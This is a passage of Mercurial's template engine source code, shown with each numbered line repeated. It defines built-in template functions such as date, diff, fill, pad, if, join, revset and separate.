508 # function with argspec: return dict of named args
509 _poskeys, varkey, _keys, optkey = argspec = parser.splitargspec(argspec)
509 _poskeys, varkey, _keys, optkey = argspec = parser.splitargspec(argspec)
510 treeargs = parser.buildargsdict(getlist(exp), funcname, argspec,
510 treeargs = parser.buildargsdict(getlist(exp), funcname, argspec,
511 keyvaluenode='keyvalue', keynode='symbol')
511 keyvaluenode='keyvalue', keynode='symbol')
512 compargs = util.sortdict()
512 compargs = util.sortdict()
513 if varkey:
513 if varkey:
514 compargs[varkey] = compilelist(treeargs.pop(varkey))
514 compargs[varkey] = compilelist(treeargs.pop(varkey))
515 if optkey:
515 if optkey:
516 compargs[optkey] = compiledict(treeargs.pop(optkey))
516 compargs[optkey] = compiledict(treeargs.pop(optkey))
517 compargs.update(compiledict(treeargs))
517 compargs.update(compiledict(treeargs))
518 return compargs
518 return compargs
519
519
520 def buildkeyvaluepair(exp, content):
520 def buildkeyvaluepair(exp, content):
521 raise error.ParseError(_("can't use a key-value pair in this context"))
521 raise error.ParseError(_("can't use a key-value pair in this context"))
522
522
523 # dict of template built-in functions
523 # dict of template built-in functions
524 funcs = {}
524 funcs = {}
525
525
526 templatefunc = registrar.templatefunc(funcs)
526 templatefunc = registrar.templatefunc(funcs)
527
527
528 @templatefunc('date(date[, fmt])')
528 @templatefunc('date(date[, fmt])')
529 def date(context, mapping, args):
529 def date(context, mapping, args):
530 """Format a date. See :hg:`help dates` for formatting
530 """Format a date. See :hg:`help dates` for formatting
531 strings. The default is a Unix date format, including the timezone:
531 strings. The default is a Unix date format, including the timezone:
532 "Mon Sep 04 15:13:13 2006 0700"."""
532 "Mon Sep 04 15:13:13 2006 0700"."""
533 if not (1 <= len(args) <= 2):
533 if not (1 <= len(args) <= 2):
534 # i18n: "date" is a keyword
534 # i18n: "date" is a keyword
535 raise error.ParseError(_("date expects one or two arguments"))
535 raise error.ParseError(_("date expects one or two arguments"))
536
536
537 date = evalfuncarg(context, mapping, args[0])
537 date = evalfuncarg(context, mapping, args[0])
538 fmt = None
538 fmt = None
539 if len(args) == 2:
539 if len(args) == 2:
540 fmt = evalstring(context, mapping, args[1])
540 fmt = evalstring(context, mapping, args[1])
541 try:
541 try:
542 if fmt is None:
542 if fmt is None:
543 return util.datestr(date)
543 return util.datestr(date)
544 else:
544 else:
545 return util.datestr(date, fmt)
545 return util.datestr(date, fmt)
546 except (TypeError, ValueError):
546 except (TypeError, ValueError):
547 # i18n: "date" is a keyword
547 # i18n: "date" is a keyword
548 raise error.ParseError(_("date expects a date information"))
548 raise error.ParseError(_("date expects a date information"))
549
549
550 @templatefunc('dict([[key=]value...])', argspec='*args **kwargs')
550 @templatefunc('dict([[key=]value...])', argspec='*args **kwargs')
551 def dict_(context, mapping, args):
551 def dict_(context, mapping, args):
552 """Construct a dict from key-value pairs. A key may be omitted if
552 """Construct a dict from key-value pairs. A key may be omitted if
553 a value expression can provide an unambiguous name."""
553 a value expression can provide an unambiguous name."""
554 data = util.sortdict()
554 data = util.sortdict()
555
555
556 for v in args['args']:
556 for v in args['args']:
557 k = findsymbolicname(v)
557 k = findsymbolicname(v)
558 if not k:
558 if not k:
559 raise error.ParseError(_('dict key cannot be inferred'))
559 raise error.ParseError(_('dict key cannot be inferred'))
560 if k in data or k in args['kwargs']:
560 if k in data or k in args['kwargs']:
561 raise error.ParseError(_("duplicated dict key '%s' inferred") % k)
561 raise error.ParseError(_("duplicated dict key '%s' inferred") % k)
562 data[k] = evalfuncarg(context, mapping, v)
562 data[k] = evalfuncarg(context, mapping, v)
563
563
564 data.update((k, evalfuncarg(context, mapping, v))
564 data.update((k, evalfuncarg(context, mapping, v))
565 for k, v in args['kwargs'].iteritems())
565 for k, v in args['kwargs'].iteritems())
566 return templatekw.hybriddict(data)
566 return templatekw.hybriddict(data)
567
567
568 @templatefunc('diff([includepattern [, excludepattern]])')
568 @templatefunc('diff([includepattern [, excludepattern]])')
569 def diff(context, mapping, args):
569 def diff(context, mapping, args):
570 """Show a diff, optionally
570 """Show a diff, optionally
571 specifying files to include or exclude."""
571 specifying files to include or exclude."""
572 if len(args) > 2:
572 if len(args) > 2:
573 # i18n: "diff" is a keyword
573 # i18n: "diff" is a keyword
574 raise error.ParseError(_("diff expects zero, one, or two arguments"))
574 raise error.ParseError(_("diff expects zero, one, or two arguments"))
575
575
576 def getpatterns(i):
576 def getpatterns(i):
577 if i < len(args):
577 if i < len(args):
578 s = evalstring(context, mapping, args[i]).strip()
578 s = evalstring(context, mapping, args[i]).strip()
579 if s:
579 if s:
580 return [s]
580 return [s]
581 return []
581 return []
582
582
583 ctx = mapping['ctx']
583 ctx = mapping['ctx']
584 chunks = ctx.diff(match=ctx.match([], getpatterns(0), getpatterns(1)))
584 chunks = ctx.diff(match=ctx.match([], getpatterns(0), getpatterns(1)))
585
585
586 return ''.join(chunks)
586 return ''.join(chunks)
587
587
588 @templatefunc('files(pattern)')
588 @templatefunc('files(pattern)')
589 def files(context, mapping, args):
589 def files(context, mapping, args):
590 """All files of the current changeset matching the pattern. See
590 """All files of the current changeset matching the pattern. See
591 :hg:`help patterns`."""
591 :hg:`help patterns`."""
592 if not len(args) == 1:
592 if not len(args) == 1:
593 # i18n: "files" is a keyword
593 # i18n: "files" is a keyword
594 raise error.ParseError(_("files expects one argument"))
594 raise error.ParseError(_("files expects one argument"))
595
595
596 raw = evalstring(context, mapping, args[0])
596 raw = evalstring(context, mapping, args[0])
597 ctx = mapping['ctx']
597 ctx = mapping['ctx']
598 m = ctx.match([raw])
598 m = ctx.match([raw])
599 files = list(ctx.matches(m))
599 files = list(ctx.matches(m))
600 return templatekw.showlist("file", files, mapping)
600 return templatekw.showlist("file", files, mapping)
601
601
602 @templatefunc('fill(text[, width[, initialident[, hangindent]]])')
602 @templatefunc('fill(text[, width[, initialident[, hangindent]]])')
603 def fill(context, mapping, args):
603 def fill(context, mapping, args):
604 """Fill many
604 """Fill many
605 paragraphs with optional indentation. See the "fill" filter."""
605 paragraphs with optional indentation. See the "fill" filter."""
606 if not (1 <= len(args) <= 4):
606 if not (1 <= len(args) <= 4):
607 # i18n: "fill" is a keyword
607 # i18n: "fill" is a keyword
608 raise error.ParseError(_("fill expects one to four arguments"))
608 raise error.ParseError(_("fill expects one to four arguments"))
609
609
610 text = evalstring(context, mapping, args[0])
610 text = evalstring(context, mapping, args[0])
611 width = 76
611 width = 76
612 initindent = ''
612 initindent = ''
613 hangindent = ''
613 hangindent = ''
614 if 2 <= len(args) <= 4:
614 if 2 <= len(args) <= 4:
615 width = evalinteger(context, mapping, args[1],
615 width = evalinteger(context, mapping, args[1],
616 # i18n: "fill" is a keyword
616 # i18n: "fill" is a keyword
617 _("fill expects an integer width"))
617 _("fill expects an integer width"))
618 try:
618 try:
619 initindent = evalstring(context, mapping, args[2])
619 initindent = evalstring(context, mapping, args[2])
620 hangindent = evalstring(context, mapping, args[3])
620 hangindent = evalstring(context, mapping, args[3])
621 except IndexError:
621 except IndexError:
622 pass
622 pass
623
623
624 return templatefilters.fill(text, width, initindent, hangindent)
624 return templatefilters.fill(text, width, initindent, hangindent)
625
625
626 @templatefunc('formatnode(node)')
626 @templatefunc('formatnode(node)')
627 def formatnode(context, mapping, args):
627 def formatnode(context, mapping, args):
628 """Obtain the preferred form of a changeset hash. (DEPRECATED)"""
628 """Obtain the preferred form of a changeset hash. (DEPRECATED)"""
629 if len(args) != 1:
629 if len(args) != 1:
630 # i18n: "formatnode" is a keyword
630 # i18n: "formatnode" is a keyword
631 raise error.ParseError(_("formatnode expects one argument"))
631 raise error.ParseError(_("formatnode expects one argument"))
632
632
633 ui = mapping['ui']
633 ui = mapping['ui']
634 node = evalstring(context, mapping, args[0])
634 node = evalstring(context, mapping, args[0])
635 if ui.debugflag:
635 if ui.debugflag:
636 return node
636 return node
637 return templatefilters.short(node)
637 return templatefilters.short(node)
638
638
639 @templatefunc('pad(text, width[, fillchar=\' \'[, left=False]])',
639 @templatefunc('pad(text, width[, fillchar=\' \'[, left=False]])',
640 argspec='text width fillchar left')
640 argspec='text width fillchar left')
641 def pad(context, mapping, args):
641 def pad(context, mapping, args):
642 """Pad text with a
642 """Pad text with a
643 fill character."""
643 fill character."""
644 if 'text' not in args or 'width' not in args:
644 if 'text' not in args or 'width' not in args:
645 # i18n: "pad" is a keyword
645 # i18n: "pad" is a keyword
646 raise error.ParseError(_("pad() expects two to four arguments"))
646 raise error.ParseError(_("pad() expects two to four arguments"))
647
647
648 width = evalinteger(context, mapping, args['width'],
648 width = evalinteger(context, mapping, args['width'],
649 # i18n: "pad" is a keyword
649 # i18n: "pad" is a keyword
650 _("pad() expects an integer width"))
650 _("pad() expects an integer width"))
651
651
652 text = evalstring(context, mapping, args['text'])
652 text = evalstring(context, mapping, args['text'])
653
653
654 left = False
654 left = False
655 fillchar = ' '
655 fillchar = ' '
656 if 'fillchar' in args:
656 if 'fillchar' in args:
657 fillchar = evalstring(context, mapping, args['fillchar'])
657 fillchar = evalstring(context, mapping, args['fillchar'])
658 if len(color.stripeffects(fillchar)) != 1:
658 if len(color.stripeffects(fillchar)) != 1:
659 # i18n: "pad" is a keyword
659 # i18n: "pad" is a keyword
660 raise error.ParseError(_("pad() expects a single fill character"))
660 raise error.ParseError(_("pad() expects a single fill character"))
661 if 'left' in args:
661 if 'left' in args:
662 left = evalboolean(context, mapping, args['left'])
662 left = evalboolean(context, mapping, args['left'])
663
663
664 fillwidth = width - encoding.colwidth(color.stripeffects(text))
664 fillwidth = width - encoding.colwidth(color.stripeffects(text))
665 if fillwidth <= 0:
665 if fillwidth <= 0:
666 return text
666 return text
667 if left:
667 if left:
668 return fillchar * fillwidth + text
668 return fillchar * fillwidth + text
669 else:
669 else:
670 return text + fillchar * fillwidth
670 return text + fillchar * fillwidth
671
671
672 @templatefunc('indent(text, indentchars[, firstline])')
672 @templatefunc('indent(text, indentchars[, firstline])')
673 def indent(context, mapping, args):
673 def indent(context, mapping, args):
674 """Indents all non-empty lines
674 """Indents all non-empty lines
675 with the characters given in the indentchars string. An optional
675 with the characters given in the indentchars string. An optional
676 third parameter will override the indent for the first line only
676 third parameter will override the indent for the first line only
677 if present."""
677 if present."""
678 if not (2 <= len(args) <= 3):
678 if not (2 <= len(args) <= 3):
679 # i18n: "indent" is a keyword
679 # i18n: "indent" is a keyword
680 raise error.ParseError(_("indent() expects two or three arguments"))
680 raise error.ParseError(_("indent() expects two or three arguments"))
681
681
682 text = evalstring(context, mapping, args[0])
682 text = evalstring(context, mapping, args[0])
683 indent = evalstring(context, mapping, args[1])
683 indent = evalstring(context, mapping, args[1])
684
684
685 if len(args) == 3:
685 if len(args) == 3:
686 firstline = evalstring(context, mapping, args[2])
686 firstline = evalstring(context, mapping, args[2])
687 else:
687 else:
688 firstline = indent
688 firstline = indent
689
689
690 # the indent function doesn't indent the first line, so we do it here
690 # the indent function doesn't indent the first line, so we do it here
691 return templatefilters.indent(firstline + text, indent)
691 return templatefilters.indent(firstline + text, indent)
692
692
693 @templatefunc('get(dict, key)')
693 @templatefunc('get(dict, key)')
694 def get(context, mapping, args):
694 def get(context, mapping, args):
695 """Get an attribute/key from an object. Some keywords
695 """Get an attribute/key from an object. Some keywords
696 are complex types. This function allows you to obtain the value of an
696 are complex types. This function allows you to obtain the value of an
697 attribute on these types."""
697 attribute on these types."""
698 if len(args) != 2:
698 if len(args) != 2:
699 # i18n: "get" is a keyword
699 # i18n: "get" is a keyword
700 raise error.ParseError(_("get() expects two arguments"))
700 raise error.ParseError(_("get() expects two arguments"))
701
701
702 dictarg = evalfuncarg(context, mapping, args[0])
702 dictarg = evalfuncarg(context, mapping, args[0])
703 if not util.safehasattr(dictarg, 'get'):
703 if not util.safehasattr(dictarg, 'get'):
704 # i18n: "get" is a keyword
704 # i18n: "get" is a keyword
705 raise error.ParseError(_("get() expects a dict as first argument"))
705 raise error.ParseError(_("get() expects a dict as first argument"))
706
706
707 key = evalfuncarg(context, mapping, args[1])
707 key = evalfuncarg(context, mapping, args[1])
708 return dictarg.get(key)
708 return dictarg.get(key)
709
709
710 @templatefunc('if(expr, then[, else])')
710 @templatefunc('if(expr, then[, else])')
711 def if_(context, mapping, args):
711 def if_(context, mapping, args):
712 """Conditionally execute based on the result of
712 """Conditionally execute based on the result of
713 an expression."""
713 an expression."""
714 if not (2 <= len(args) <= 3):
714 if not (2 <= len(args) <= 3):
715 # i18n: "if" is a keyword
715 # i18n: "if" is a keyword
716 raise error.ParseError(_("if expects two or three arguments"))
716 raise error.ParseError(_("if expects two or three arguments"))
717
717
718 test = evalboolean(context, mapping, args[0])
718 test = evalboolean(context, mapping, args[0])
719 if test:
719 if test:
720 yield args[1][0](context, mapping, args[1][1])
720 yield args[1][0](context, mapping, args[1][1])
721 elif len(args) == 3:
721 elif len(args) == 3:
722 yield args[2][0](context, mapping, args[2][1])
722 yield args[2][0](context, mapping, args[2][1])
723
723
724 @templatefunc('ifcontains(needle, haystack, then[, else])')
724 @templatefunc('ifcontains(needle, haystack, then[, else])')
725 def ifcontains(context, mapping, args):
725 def ifcontains(context, mapping, args):
726 """Conditionally execute based
726 """Conditionally execute based
727 on whether the item "needle" is in "haystack"."""
727 on whether the item "needle" is in "haystack"."""
728 if not (3 <= len(args) <= 4):
728 if not (3 <= len(args) <= 4):
729 # i18n: "ifcontains" is a keyword
729 # i18n: "ifcontains" is a keyword
730 raise error.ParseError(_("ifcontains expects three or four arguments"))
730 raise error.ParseError(_("ifcontains expects three or four arguments"))
731
731
732 needle = evalstring(context, mapping, args[0])
732 needle = evalstring(context, mapping, args[0])
733 haystack = evalfuncarg(context, mapping, args[1])
733 haystack = evalfuncarg(context, mapping, args[1])
734
734
735 if needle in haystack:
735 if needle in haystack:
736 yield args[2][0](context, mapping, args[2][1])
736 yield args[2][0](context, mapping, args[2][1])
737 elif len(args) == 4:
737 elif len(args) == 4:
738 yield args[3][0](context, mapping, args[3][1])
738 yield args[3][0](context, mapping, args[3][1])
739
739
740 @templatefunc('ifeq(expr1, expr2, then[, else])')
740 @templatefunc('ifeq(expr1, expr2, then[, else])')
741 def ifeq(context, mapping, args):
741 def ifeq(context, mapping, args):
742 """Conditionally execute based on
742 """Conditionally execute based on
743 whether 2 items are equivalent."""
743 whether 2 items are equivalent."""
744 if not (3 <= len(args) <= 4):
744 if not (3 <= len(args) <= 4):
745 # i18n: "ifeq" is a keyword
745 # i18n: "ifeq" is a keyword
746 raise error.ParseError(_("ifeq expects three or four arguments"))
746 raise error.ParseError(_("ifeq expects three or four arguments"))
747
747
748 test = evalstring(context, mapping, args[0])
748 test = evalstring(context, mapping, args[0])
749 match = evalstring(context, mapping, args[1])
749 match = evalstring(context, mapping, args[1])
750 if test == match:
750 if test == match:
751 yield args[2][0](context, mapping, args[2][1])
751 yield args[2][0](context, mapping, args[2][1])
752 elif len(args) == 4:
752 elif len(args) == 4:
753 yield args[3][0](context, mapping, args[3][1])
753 yield args[3][0](context, mapping, args[3][1])
754
754
755 @templatefunc('join(list, sep)')
755 @templatefunc('join(list, sep)')
756 def join(context, mapping, args):
756 def join(context, mapping, args):
757 """Join items in a list with a delimiter."""
757 """Join items in a list with a delimiter."""
758 if not (1 <= len(args) <= 2):
758 if not (1 <= len(args) <= 2):
759 # i18n: "join" is a keyword
759 # i18n: "join" is a keyword
760 raise error.ParseError(_("join expects one or two arguments"))
760 raise error.ParseError(_("join expects one or two arguments"))
761
761
762 joinset = args[0][0](context, mapping, args[0][1])
762 joinset = args[0][0](context, mapping, args[0][1])
763 if util.safehasattr(joinset, 'itermaps'):
763 if util.safehasattr(joinset, 'itermaps'):
764 jf = joinset.joinfmt
764 jf = joinset.joinfmt
765 joinset = [jf(x) for x in joinset.itermaps()]
765 joinset = [jf(x) for x in joinset.itermaps()]
766
766
767 joiner = " "
767 joiner = " "
768 if len(args) > 1:
768 if len(args) > 1:
769 joiner = evalstring(context, mapping, args[1])
769 joiner = evalstring(context, mapping, args[1])
770
770
771 first = True
771 first = True
772 for x in joinset:
772 for x in joinset:
773 if first:
773 if first:
774 first = False
774 first = False
775 else:
775 else:
776 yield joiner
776 yield joiner
777 yield x
777 yield x
778
778
779 @templatefunc('label(label, expr)')
779 @templatefunc('label(label, expr)')
780 def label(context, mapping, args):
780 def label(context, mapping, args):
781 """Apply a label to generated content. Content with
781 """Apply a label to generated content. Content with
782 a label applied can result in additional post-processing, such as
782 a label applied can result in additional post-processing, such as
783 automatic colorization."""
783 automatic colorization."""
784 if len(args) != 2:
784 if len(args) != 2:
785 # i18n: "label" is a keyword
785 # i18n: "label" is a keyword
786 raise error.ParseError(_("label expects two arguments"))
786 raise error.ParseError(_("label expects two arguments"))
787
787
788 ui = mapping['ui']
788 ui = mapping['ui']
789 thing = evalstring(context, mapping, args[1])
789 thing = evalstring(context, mapping, args[1])
790 # preserve unknown symbol as literal so effects like 'red', 'bold',
790 # preserve unknown symbol as literal so effects like 'red', 'bold',
791 # etc. don't need to be quoted
791 # etc. don't need to be quoted
792 label = evalstringliteral(context, mapping, args[0])
792 label = evalstringliteral(context, mapping, args[0])
793
793
794 return ui.label(thing, label)
794 return ui.label(thing, label)
795
795
796 @templatefunc('latesttag([pattern])')
796 @templatefunc('latesttag([pattern])')
797 def latesttag(context, mapping, args):
797 def latesttag(context, mapping, args):
798 """The global tags matching the given pattern on the
798 """The global tags matching the given pattern on the
799 most recent globally tagged ancestor of this changeset.
799 most recent globally tagged ancestor of this changeset.
800 If no such tags exist, the "{tag}" template resolves to
800 If no such tags exist, the "{tag}" template resolves to
801 the string "null"."""
801 the string "null"."""
802 if len(args) > 1:
802 if len(args) > 1:
803 # i18n: "latesttag" is a keyword
803 # i18n: "latesttag" is a keyword
804 raise error.ParseError(_("latesttag expects at most one argument"))
804 raise error.ParseError(_("latesttag expects at most one argument"))
805
805
806 pattern = None
806 pattern = None
807 if len(args) == 1:
807 if len(args) == 1:
808 pattern = evalstring(context, mapping, args[0])
808 pattern = evalstring(context, mapping, args[0])
809
809
810 return templatekw.showlatesttags(pattern, **mapping)
810 return templatekw.showlatesttags(pattern, **mapping)
811
811
812 @templatefunc('localdate(date[, tz])')
812 @templatefunc('localdate(date[, tz])')
813 def localdate(context, mapping, args):
813 def localdate(context, mapping, args):
814 """Converts a date to the specified timezone.
814 """Converts a date to the specified timezone.
815 The default is local date."""
815 The default is local date."""
816 if not (1 <= len(args) <= 2):
816 if not (1 <= len(args) <= 2):
817 # i18n: "localdate" is a keyword
817 # i18n: "localdate" is a keyword
818 raise error.ParseError(_("localdate expects one or two arguments"))
818 raise error.ParseError(_("localdate expects one or two arguments"))
819
819
820 date = evalfuncarg(context, mapping, args[0])
820 date = evalfuncarg(context, mapping, args[0])
821 try:
821 try:
822 date = util.parsedate(date)
822 date = util.parsedate(date)
823 except AttributeError: # not str nor date tuple
823 except AttributeError: # not str nor date tuple
824 # i18n: "localdate" is a keyword
824 # i18n: "localdate" is a keyword
825 raise error.ParseError(_("localdate expects a date information"))
825 raise error.ParseError(_("localdate expects a date information"))
826 if len(args) >= 2:
826 if len(args) >= 2:
827 tzoffset = None
827 tzoffset = None
828 tz = evalfuncarg(context, mapping, args[1])
828 tz = evalfuncarg(context, mapping, args[1])
829 if isinstance(tz, str):
829 if isinstance(tz, str):
830 tzoffset, remainder = util.parsetimezone(tz)
830 tzoffset, remainder = util.parsetimezone(tz)
831 if remainder:
831 if remainder:
832 tzoffset = None
832 tzoffset = None
833 if tzoffset is None:
833 if tzoffset is None:
834 try:
834 try:
835 tzoffset = int(tz)
835 tzoffset = int(tz)
836 except (TypeError, ValueError):
836 except (TypeError, ValueError):
837 # i18n: "localdate" is a keyword
837 # i18n: "localdate" is a keyword
838 raise error.ParseError(_("localdate expects a timezone"))
838 raise error.ParseError(_("localdate expects a timezone"))
839 else:
839 else:
840 tzoffset = util.makedate()[1]
840 tzoffset = util.makedate()[1]
841 return (date[0], tzoffset)
841 return (date[0], tzoffset)
842
842
843 @templatefunc('max(iterable)')
843 @templatefunc('max(iterable)')
844 def max_(context, mapping, args, **kwargs):
844 def max_(context, mapping, args, **kwargs):
845 """Return the max of an iterable"""
845 """Return the max of an iterable"""
846 if len(args) != 1:
846 if len(args) != 1:
847 # i18n: "max" is a keyword
847 # i18n: "max" is a keyword
848 raise error.ParseError(_("max expects one arguments"))
848 raise error.ParseError(_("max expects one arguments"))
849
849
850 iterable = evalfuncarg(context, mapping, args[0])
850 iterable = evalfuncarg(context, mapping, args[0])
851 try:
851 try:
852 return max(iterable)
852 return max(iterable)
853 except (TypeError, ValueError):
853 except (TypeError, ValueError):
854 # i18n: "max" is a keyword
854 # i18n: "max" is a keyword
855 raise error.ParseError(_("max first argument should be an iterable"))
855 raise error.ParseError(_("max first argument should be an iterable"))
856
856
857 @templatefunc('min(iterable)')
857 @templatefunc('min(iterable)')
858 def min_(context, mapping, args, **kwargs):
858 def min_(context, mapping, args, **kwargs):
859 """Return the min of an iterable"""
859 """Return the min of an iterable"""
860 if len(args) != 1:
860 if len(args) != 1:
861 # i18n: "min" is a keyword
861 # i18n: "min" is a keyword
862 raise error.ParseError(_("min expects one arguments"))
862 raise error.ParseError(_("min expects one arguments"))
863
863
864 iterable = evalfuncarg(context, mapping, args[0])
864 iterable = evalfuncarg(context, mapping, args[0])
865 try:
865 try:
866 return min(iterable)
866 return min(iterable)
867 except (TypeError, ValueError):
867 except (TypeError, ValueError):
868 # i18n: "min" is a keyword
868 # i18n: "min" is a keyword
869 raise error.ParseError(_("min first argument should be an iterable"))
869 raise error.ParseError(_("min first argument should be an iterable"))
870
870
871 @templatefunc('mod(a, b)')
871 @templatefunc('mod(a, b)')
872 def mod(context, mapping, args):
872 def mod(context, mapping, args):
873 """Calculate a mod b such that a / b + a mod b == a"""
873 """Calculate a mod b such that a / b + a mod b == a"""
874 if not len(args) == 2:
874 if not len(args) == 2:
875 # i18n: "mod" is a keyword
875 # i18n: "mod" is a keyword
876 raise error.ParseError(_("mod expects two arguments"))
876 raise error.ParseError(_("mod expects two arguments"))
877
877
878 func = lambda a, b: a % b
878 func = lambda a, b: a % b
879 return runarithmetic(context, mapping, (func, args[0], args[1]))
879 return runarithmetic(context, mapping, (func, args[0], args[1]))
880
880
881 @templatefunc('obsfatedate(markers)')
881 @templatefunc('obsfatedate(markers)')
882 def obsfatedate(context, mapping, args):
882 def obsfatedate(context, mapping, args):
883 """Compute obsfate related information based on markers (EXPERIMENTAL)"""
883 """Compute obsfate related information based on markers (EXPERIMENTAL)"""
884 if len(args) != 1:
884 if len(args) != 1:
885 # i18n: "obsfatedate" is a keyword
885 # i18n: "obsfatedate" is a keyword
886 raise error.ParseError(_("obsfatedate expects one arguments"))
886 raise error.ParseError(_("obsfatedate expects one arguments"))
887
887
888 markers = evalfuncarg(context, mapping, args[0])
888 markers = evalfuncarg(context, mapping, args[0])
889
889
890 try:
890 try:
891 data = obsutil.markersdates(markers)
891 data = obsutil.markersdates(markers)
892 return templatekw.hybridlist(data, name='date', fmt='%d %d')
892 return templatekw.hybridlist(data, name='date', fmt='%d %d')
893 except (TypeError, KeyError):
893 except (TypeError, KeyError):
894 # i18n: "obsfatedate" is a keyword
894 # i18n: "obsfatedate" is a keyword
895 errmsg = _("obsfatedate first argument should be an iterable")
895 errmsg = _("obsfatedate first argument should be an iterable")
896 raise error.ParseError(errmsg)
896 raise error.ParseError(errmsg)
897
897
898 @templatefunc('obsfateusers(markers)')
898 @templatefunc('obsfateusers(markers)')
899 def obsfateusers(context, mapping, args):
899 def obsfateusers(context, mapping, args):
900 """Compute obsfate related information based on markers (EXPERIMENTAL)"""
900 """Compute obsfate related information based on markers (EXPERIMENTAL)"""
901 if len(args) != 1:
901 if len(args) != 1:
902 # i18n: "obsfateusers" is a keyword
902 # i18n: "obsfateusers" is a keyword
903 raise error.ParseError(_("obsfateusers expects one arguments"))
903 raise error.ParseError(_("obsfateusers expects one arguments"))
904
904
905 markers = evalfuncarg(context, mapping, args[0])
905 markers = evalfuncarg(context, mapping, args[0])
906
906
907 try:
907 try:
908 data = obsutil.markersusers(markers)
908 data = obsutil.markersusers(markers)
909 return templatekw.hybridlist(data, name='user')
909 return templatekw.hybridlist(data, name='user')
910 except (TypeError, KeyError, ValueError):
910 except (TypeError, KeyError, ValueError):
911 # i18n: "obsfateusers" is a keyword
911 # i18n: "obsfateusers" is a keyword
912 msg = _("obsfateusers first argument should be an iterable of "
912 msg = _("obsfateusers first argument should be an iterable of "
913 "obsmakers")
913 "obsmakers")
914 raise error.ParseError(msg)
914 raise error.ParseError(msg)
915
915
916 @templatefunc('obsfateverb(successors)')
916 @templatefunc('obsfateverb(successors)')
917 def obsfateverb(context, mapping, args):
917 def obsfateverb(context, mapping, args):
918 """Compute obsfate related information based on successors (EXPERIMENTAL)"""
918 """Compute obsfate related information based on successors (EXPERIMENTAL)"""
919 if len(args) != 1:
919 if len(args) != 1:
920 # i18n: "obsfateverb" is a keyword
920 # i18n: "obsfateverb" is a keyword
921 raise error.ParseError(_("obsfateverb expects one arguments"))
921 raise error.ParseError(_("obsfateverb expects one arguments"))
922
922
923 successors = evalfuncarg(context, mapping, args[0])
923 successors = evalfuncarg(context, mapping, args[0])
924
924
925 try:
925 try:
926 return obsutil.successorsetverb(successors)
926 return obsutil.successorsetverb(successors)
927 except TypeError:
927 except TypeError:
928 # i18n: "obsfateverb" is a keyword
928 # i18n: "obsfateverb" is a keyword
929 errmsg = _("obsfateverb first argument should be countable")
929 errmsg = _("obsfateverb first argument should be countable")
930 raise error.ParseError(errmsg)
930 raise error.ParseError(errmsg)
931
931
932 @templatefunc('relpath(path)')
932 @templatefunc('relpath(path)')
933 def relpath(context, mapping, args):
933 def relpath(context, mapping, args):
934 """Convert a repository-absolute path into a filesystem path relative to
934 """Convert a repository-absolute path into a filesystem path relative to
935 the current working directory."""
935 the current working directory."""
936 if len(args) != 1:
936 if len(args) != 1:
937 # i18n: "relpath" is a keyword
937 # i18n: "relpath" is a keyword
938 raise error.ParseError(_("relpath expects one argument"))
938 raise error.ParseError(_("relpath expects one argument"))
939
939
940 repo = mapping['ctx'].repo()
940 repo = mapping['ctx'].repo()
941 path = evalstring(context, mapping, args[0])
941 path = evalstring(context, mapping, args[0])
942 return repo.pathto(path)
942 return repo.pathto(path)
943
943
944 @templatefunc('revset(query[, formatargs...])')
944 @templatefunc('revset(query[, formatargs...])')
945 def revset(context, mapping, args):
945 def revset(context, mapping, args):
946 """Execute a revision set query. See
946 """Execute a revision set query. See
947 :hg:`help revset`."""
947 :hg:`help revset`."""
948 if not len(args) > 0:
948 if not len(args) > 0:
949 # i18n: "revset" is a keyword
949 # i18n: "revset" is a keyword
950 raise error.ParseError(_("revset expects one or more arguments"))
950 raise error.ParseError(_("revset expects one or more arguments"))
951
951
952 raw = evalstring(context, mapping, args[0])
952 raw = evalstring(context, mapping, args[0])
953 ctx = mapping['ctx']
953 ctx = mapping['ctx']
954 repo = ctx.repo()
954 repo = ctx.repo()
955
955
956 def query(expr):
956 def query(expr):
957 m = revsetmod.match(repo.ui, expr, repo=repo)
957 m = revsetmod.match(repo.ui, expr, repo=repo)
958 return m(repo)
958 return m(repo)
959
959
960 if len(args) > 1:
960 if len(args) > 1:
961 formatargs = [evalfuncarg(context, mapping, a) for a in args[1:]]
961 formatargs = [evalfuncarg(context, mapping, a) for a in args[1:]]
962 revs = query(revsetlang.formatspec(raw, *formatargs))
962 revs = query(revsetlang.formatspec(raw, *formatargs))
963 revs = list(revs)
963 revs = list(revs)
964 else:
964 else:
965 revsetcache = mapping['cache'].setdefault("revsetcache", {})
965 revsetcache = mapping['cache'].setdefault("revsetcache", {})
966 if raw in revsetcache:
966 if raw in revsetcache:
967 revs = revsetcache[raw]
967 revs = revsetcache[raw]
968 else:
968 else:
969 revs = query(raw)
969 revs = query(raw)
970 revs = list(revs)
970 revs = list(revs)
971 revsetcache[raw] = revs
971 revsetcache[raw] = revs
972
972
973 return templatekw.showrevslist("revision", revs, **mapping)
973 return templatekw.showrevslist("revision", revs, **mapping)
974
974
975 @templatefunc('rstdoc(text, style)')
975 @templatefunc('rstdoc(text, style)')
976 def rstdoc(context, mapping, args):
976 def rstdoc(context, mapping, args):
977 """Format reStructuredText."""
977 """Format reStructuredText."""
978 if len(args) != 2:
978 if len(args) != 2:
979 # i18n: "rstdoc" is a keyword
979 # i18n: "rstdoc" is a keyword
980 raise error.ParseError(_("rstdoc expects two arguments"))
980 raise error.ParseError(_("rstdoc expects two arguments"))
981
981
982 text = evalstring(context, mapping, args[0])
982 text = evalstring(context, mapping, args[0])
983 style = evalstring(context, mapping, args[1])
983 style = evalstring(context, mapping, args[1])
984
984
985 return minirst.format(text, style=style, keep=['verbose'])
985 return minirst.format(text, style=style, keep=['verbose'])
986
986
987 @templatefunc('separate(sep, args)', argspec='sep *args')
987 @templatefunc('separate(sep, args)', argspec='sep *args')
988 def separate(context, mapping, args):
988 def separate(context, mapping, args):
989 """Add a separator between non-empty arguments."""
989 """Add a separator between non-empty arguments."""
990 if 'sep' not in args:
990 if 'sep' not in args:
991 # i18n: "separate" is a keyword
991 # i18n: "separate" is a keyword
992 raise error.ParseError(_("separate expects at least one argument"))
992 raise error.ParseError(_("separate expects at least one argument"))
993
993
994 sep = evalstring(context, mapping, args['sep'])
994 sep = evalstring(context, mapping, args['sep'])
995 first = True
995 first = True
996 for arg in args['args']:
996 for arg in args['args']:
997 argstr = evalstring(context, mapping, arg)
997 argstr = evalstring(context, mapping, arg)
998 if not argstr:
998 if not argstr:
999 continue
999 continue
1000 if first:
1000 if first:
1001 first = False
1001 first = False
1002 else:
1002 else:
1003 yield sep
1003 yield sep
1004 yield argstr
1004 yield argstr
1005
1005
1006 @templatefunc('shortest(node, minlength=4)')
